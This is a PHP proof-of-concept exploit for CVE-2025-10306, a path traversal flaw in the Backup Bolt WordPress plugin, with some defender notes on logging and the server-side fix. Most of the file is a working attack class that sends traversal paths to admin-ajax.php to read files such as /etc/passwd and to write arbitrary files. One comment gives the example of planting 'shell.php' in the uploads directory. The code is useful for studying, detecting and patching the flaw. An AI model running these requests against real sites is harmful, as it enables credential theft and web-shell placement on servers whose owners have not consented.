<?php
/**
* CVE-2025-10306 - Backup Bolt Arbitrary File Download/Write PoC
* Vulnerability: Path traversal in process_backup_batch() function
* Affected: Backup Bolt plugin <= 1.4.1
* Required: Administrator-level WordPress access
*/
// PoC exploit code for CVE-2025-10306
// This demonstrates how an authenticated administrator could exploit
// the path traversal vulnerability in process_backup_batch()
/**
 * Thin HTTP client used by this PoC.
 *
 * Both exploit_* methods do the same thing: build an associative array of
 * form fields, POST it with curl to `<target_url>/wp-admin/admin-ajax.php`
 * with the caller-supplied Cookie header and an `X-Requested-With:
 * XMLHttpRequest` header, and hand back the raw response body. No parsing,
 * no error handling: curl_exec() returns `false` on a transport failure and
 * that `false` is returned to the caller unchanged.
 *
 * Defender notes (from the request shape visible here):
 *  - Every request is authenticated (session cookie + `_wpnonce`), so this is
 *    a post-auth issue as the file header states; the admin-ajax action name
 *    `backup_bolt_process_batch` together with traversal sequences or
 *    absolute paths in the `backup_path` / `output_path` fields is the
 *    observable pattern for web-server / WAF logging.
 *  - NOTE(review): the field names `backup_path`, `output_path`, `backup_data`
 *    and `batch_size` are as written in this PoC; they have not been checked
 *    against the plugin source from here.
 *  - The underlying fix is server-side: the handler should resolve the
 *    supplied path (realpath) and reject anything outside the plugin's
 *    backup directory before reading or writing. Updating past the affected
 *    release (<= 1.4.1 per the header) is the operational mitigation.
 */
class BackupBoltExploit {
// Base URL of the WordPress site, without trailing slash (the methods append
// '/wp-admin/admin-ajax.php' directly).
private $target_url;
// Raw value sent as the `Cookie:` request header, e.g. the wordpress_logged_in
// cookie string of an administrator session.
private $admin_cookies;
// Nonce value sent as the `_wpnonce` form field on every request.
private $nonce;
/**
 * @param string $target_url    site base URL, no trailing slash
 * @param string $admin_cookies full Cookie header value for an admin session
 * @param string $nonce         WordPress nonce for the AJAX action
 */
public function __construct($target_url, $admin_cookies, $nonce) {
$this->target_url = $target_url;
$this->admin_cookies = $admin_cookies;
$this->nonce = $nonce;
}
/**
 * Exploit arbitrary file download via path traversal
 * Download files outside webroot (e.g., /etc/passwd, wp-config.php backup)
 *
 * Sends `backup_path` = $malicious_path with a fixed `batch_size` of 100.
 * Returns the raw admin-ajax response body (string), or `false` if curl
 * could not complete the request. What the server does with the path is
 * not visible here and is not verified by this method.
 *
 * @param string $malicious_path value placed in the `backup_path` field
 * @return string|false
 */
public function exploit_arbitrary_download($malicious_path) {
// Construct payload with path traversal to escape webroot
$payload = array(
'action' => 'backup_bolt_process_batch',
'backup_path' => $malicious_path, // e.g., '../../../etc/'
'batch_size' => 100,
'_wpnonce' => $this->nonce
);
$ch = curl_init($this->target_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_POST, true);
// Passing an array to CURLOPT_POSTFIELDS makes curl send multipart/form-data.
curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
'Cookie: ' . $this->admin_cookies,
'X-Requested-With: XMLHttpRequest'
));
// Return the body from curl_exec() instead of echoing it.
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);
return $response;
}
/**
 * Exploit arbitrary file write via path traversal
 * Write backup zip to arbitrary location on the server
 *
 * Sends `output_path` = $destination_path and `backup_data` = base64 of
 * $backup_data. Whether the server base64-decodes `backup_data` is assumed
 * by this PoC, not shown here. Returns the raw response body, or `false`
 * on a curl transport failure.
 *
 * @param string $destination_path value placed in the `output_path` field
 * @param string $backup_data      raw bytes, base64-encoded before sending
 * @return string|false
 */
public function exploit_arbitrary_write($destination_path, $backup_data) {
$payload = array(
'action' => 'backup_bolt_process_batch',
'output_path' => $destination_path, // e.g., '/var/www/html/wp-content/uploads/shell.php'
'backup_data' => base64_encode($backup_data),
'_wpnonce' => $this->nonce
);
$ch = curl_init($this->target_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_POST, true);
// Array form fields -> multipart/form-data body.
curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
'Cookie: ' . $this->admin_cookies,
'X-Requested-With: XMLHttpRequest'
));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);
return $response;
}
}
// Example usage:
// $exploit = new BackupBoltExploit('http://target-wordpress-site.com', 'wordpress_logged_in=xxx', 'nonce_value');
// $exploit->exploit_arbitrary_download('../../../etc/');
// $exploit->exploit_arbitrary_write('/var/www/html/wp-content/uploads/malicious.zip', 'backup content');
?>